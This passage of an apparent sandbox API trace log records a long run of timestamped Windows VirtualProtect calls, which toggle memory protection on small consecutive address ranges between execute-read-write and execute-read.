lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.385] VirtualProtect (in: lpAddress=0x1e760a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.385] VirtualProtect (in: lpAddress=0x1e760a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.385] VirtualProtect (in: lpAddress=0x1e760a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.385] VirtualProtect (in: lpAddress=0x1e760a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.386] VirtualProtect (in: lpAddress=0x1e760a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.386] VirtualProtect (in: lpAddress=0x1e760ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.386] VirtualProtect (in: lpAddress=0x1e760ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.386] VirtualProtect (in: lpAddress=0x1e760b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.386] VirtualProtect (in: lpAddress=0x1e760b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.386] VirtualProtect (in: lpAddress=0x1e760b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.387] VirtualProtect (in: lpAddress=0x1e760b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.387] VirtualProtect (in: lpAddress=0x1e760b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.387] VirtualProtect (in: lpAddress=0x1e760b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.387] VirtualProtect (in: lpAddress=0x1e760bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.387] VirtualProtect (in: lpAddress=0x1e760bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.387] VirtualProtect (in: lpAddress=0x1e760c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.388] VirtualProtect (in: lpAddress=0x1e760c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.388] VirtualProtect (in: lpAddress=0x1e760c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.388] VirtualProtect (in: lpAddress=0x1e760c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.388] VirtualProtect (in: lpAddress=0x1e7610f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.388] VirtualProtect (in: lpAddress=0x1e7610f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.389] VirtualProtect (in: lpAddress=0x1e7611a, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.389] VirtualProtect (in: lpAddress=0x1e7611a, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.389] VirtualProtect (in: lpAddress=0x1e76126, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.389] VirtualProtect (in: lpAddress=0x1e76126, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.389] VirtualProtect (in: lpAddress=0x1e76143, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.389] VirtualProtect (in: lpAddress=0x1e76143, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.390] VirtualProtect (in: lpAddress=0x1e761c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.390] VirtualProtect (in: lpAddress=0x1e761c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.390] VirtualProtect (in: lpAddress=0x1e761cb, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.390] VirtualProtect (in: lpAddress=0x1e761cb, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.390] VirtualProtect (in: lpAddress=0x1e761ea, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.390] VirtualProtect (in: lpAddress=0x1e761ea, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.391] VirtualProtect (in: lpAddress=0x1e761f2, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.391] VirtualProtect (in: lpAddress=0x1e761f2, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.391] VirtualProtect (in: lpAddress=0x1e76206, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.391] VirtualProtect (in: lpAddress=0x1e76206, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.391] VirtualProtect (in: lpAddress=0x1e7620c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.392] VirtualProtect (in: lpAddress=0x1e7620c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.392] VirtualProtect (in: lpAddress=0x1e76219, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.392] VirtualProtect (in: lpAddress=0x1e76219, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.392] VirtualProtect (in: lpAddress=0x1e7625e, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.392] VirtualProtect (in: lpAddress=0x1e7625e, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.392] VirtualProtect (in: lpAddress=0x1e7677b, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.393] VirtualProtect (in: lpAddress=0x1e7677b, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.393] VirtualProtect (in: lpAddress=0x1e76781, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.393] VirtualProtect (in: lpAddress=0x1e76781, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.393] VirtualProtect (in: lpAddress=0x1e767b6, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.393] VirtualProtect (in: lpAddress=0x1e767b6, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.393] VirtualProtect (in: lpAddress=0x1e76806, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.394] VirtualProtect (in: lpAddress=0x1e76806, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.394] VirtualProtect (in: lpAddress=0x1e76858, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.394] VirtualProtect (in: lpAddress=0x1e76858, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.394] VirtualProtect (in: lpAddress=0x1e76860, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.394] VirtualProtect (in: lpAddress=0x1e76860, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.394] VirtualProtect (in: lpAddress=0x1e76868, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.395] VirtualProtect (in: lpAddress=0x1e76868, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.395] VirtualProtect (in: lpAddress=0x1e76870, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.395] VirtualProtect (in: lpAddress=0x1e76870, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.395] VirtualProtect (in: lpAddress=0x1e76878, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.395] VirtualProtect (in: lpAddress=0x1e76878, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.396] VirtualProtect (in: lpAddress=0x1e76880, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.396] VirtualProtect (in: lpAddress=0x1e76880, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.396] VirtualProtect (in: lpAddress=0x1e76888, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.396] VirtualProtect (in: lpAddress=0x1e76888, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.396] VirtualProtect (in: lpAddress=0x1e76890, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.396] VirtualProtect (in: lpAddress=0x1e76890, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.397] VirtualProtect (in: lpAddress=0x1e76898, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.397] VirtualProtect (in: lpAddress=0x1e76898, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.397] VirtualProtect (in: lpAddress=0x1e768a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.397] VirtualProtect (in: lpAddress=0x1e768a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.397] VirtualProtect (in: lpAddress=0x1e768a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.398] VirtualProtect (in: lpAddress=0x1e768a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.398] VirtualProtect (in: lpAddress=0x1e768b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.398] VirtualProtect (in: lpAddress=0x1e768b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.398] VirtualProtect (in: lpAddress=0x1e768b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.398] VirtualProtect (in: lpAddress=0x1e768b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.398] VirtualProtect (in: lpAddress=0x1e768c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.399] VirtualProtect (in: lpAddress=0x1e768c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.399] VirtualProtect (in: lpAddress=0x1e768c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.399] VirtualProtect (in: lpAddress=0x1e768c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.399] VirtualProtect (in: lpAddress=0x1e768d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.399] VirtualProtect (in: lpAddress=0x1e768d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.400] VirtualProtect (in: lpAddress=0x1e768d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.400] VirtualProtect (in: lpAddress=0x1e768d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.400] VirtualProtect (in: lpAddress=0x1e768e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.400] VirtualProtect (in: lpAddress=0x1e768e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.400] VirtualProtect (in: lpAddress=0x1e768e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.400] VirtualProtect (in: lpAddress=0x1e768e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.401] VirtualProtect (in: lpAddress=0x1e768f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.401] VirtualProtect (in: lpAddress=0x1e768f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.401] VirtualProtect (in: lpAddress=0x1e768f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.401] VirtualProtect (in: lpAddress=0x1e768f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.401] VirtualProtect (in: lpAddress=0x1e76900, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.402] VirtualProtect (in: lpAddress=0x1e76900, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.402] VirtualProtect (in: lpAddress=0x1e76908, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.402] VirtualProtect (in: lpAddress=0x1e76908, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.402] VirtualProtect (in: lpAddress=0x1e76930, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.402] VirtualProtect (in: lpAddress=0x1e76930, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.402] VirtualProtect (in: lpAddress=0x1e76938, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.403] VirtualProtect (in: lpAddress=0x1e76938, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.403] VirtualProtect (in: lpAddress=0x1e76940, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.403] VirtualProtect (in: lpAddress=0x1e76940, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.403] VirtualProtect (in: lpAddress=0x1e76948, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.403] VirtualProtect (in: lpAddress=0x1e76948, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.403] VirtualProtect (in: lpAddress=0x1e76950, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.404] VirtualProtect (in: lpAddress=0x1e76950, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.404] VirtualProtect (in: lpAddress=0x1e76958, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.404] VirtualProtect (in: lpAddress=0x1e76958, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.404] VirtualProtect (in: lpAddress=0x1e76960, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.404] VirtualProtect (in: lpAddress=0x1e76960, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.405] VirtualProtect (in: lpAddress=0x1e76968, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.405] VirtualProtect (in: lpAddress=0x1e76968, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.405] VirtualProtect (in: lpAddress=0x1e76970, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.405] VirtualProtect (in: lpAddress=0x1e76970, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.405] VirtualProtect (in: lpAddress=0x1e76978, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.405] VirtualProtect (in: lpAddress=0x1e76978, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.406] VirtualProtect (in: lpAddress=0x1e76980, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.406] VirtualProtect (in: lpAddress=0x1e76980, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.406] VirtualProtect (in: lpAddress=0x1e76988, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.406] VirtualProtect (in: lpAddress=0x1e76988, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.406] VirtualProtect (in: lpAddress=0x1e76990, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.407] VirtualProtect (in: lpAddress=0x1e76990, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.407] VirtualProtect (in: lpAddress=0x1e76998, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.407] VirtualProtect (in: lpAddress=0x1e76998, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.407] VirtualProtect (in: lpAddress=0x1e769a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.407] VirtualProtect (in: lpAddress=0x1e769a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.407] VirtualProtect (in: lpAddress=0x1e769a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.408] VirtualProtect (in: lpAddress=0x1e769a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.408] VirtualProtect (in: lpAddress=0x1e769b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.408] VirtualProtect (in: lpAddress=0x1e769b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.408] VirtualProtect (in: lpAddress=0x1e769b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.408] VirtualProtect (in: lpAddress=0x1e769b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.408] VirtualProtect (in: lpAddress=0x1e769c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.409] VirtualProtect (in: lpAddress=0x1e769c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.409] VirtualProtect (in: lpAddress=0x1e769c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.409] VirtualProtect (in: lpAddress=0x1e769c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.409] VirtualProtect (in: lpAddress=0x1e769d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.409] VirtualProtect (in: lpAddress=0x1e769d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.409] VirtualProtect (in: lpAddress=0x1e769d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.410] VirtualProtect (in: lpAddress=0x1e769d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.410] VirtualProtect (in: lpAddress=0x1e769e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.410] VirtualProtect (in: lpAddress=0x1e769e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.410] VirtualProtect (in: lpAddress=0x1e76a08, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.411] VirtualProtect (in: lpAddress=0x1e76a08, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.411] VirtualProtect (in: lpAddress=0x1e76a10, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.411] VirtualProtect (in: lpAddress=0x1e76a10, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.411] VirtualProtect (in: lpAddress=0x1e76a2f, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.411] VirtualProtect (in: lpAddress=0x1e76a2f, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.411] VirtualProtect (in: lpAddress=0x1e76a37, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.412] VirtualProtect (in: lpAddress=0x1e76a37, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.412] VirtualProtect (in: lpAddress=0x1e76a98, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.412] VirtualProtect (in: lpAddress=0x1e76a98, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.412] VirtualProtect (in: lpAddress=0x1e76aa8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.412] VirtualProtect (in: lpAddress=0x1e76aa8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: 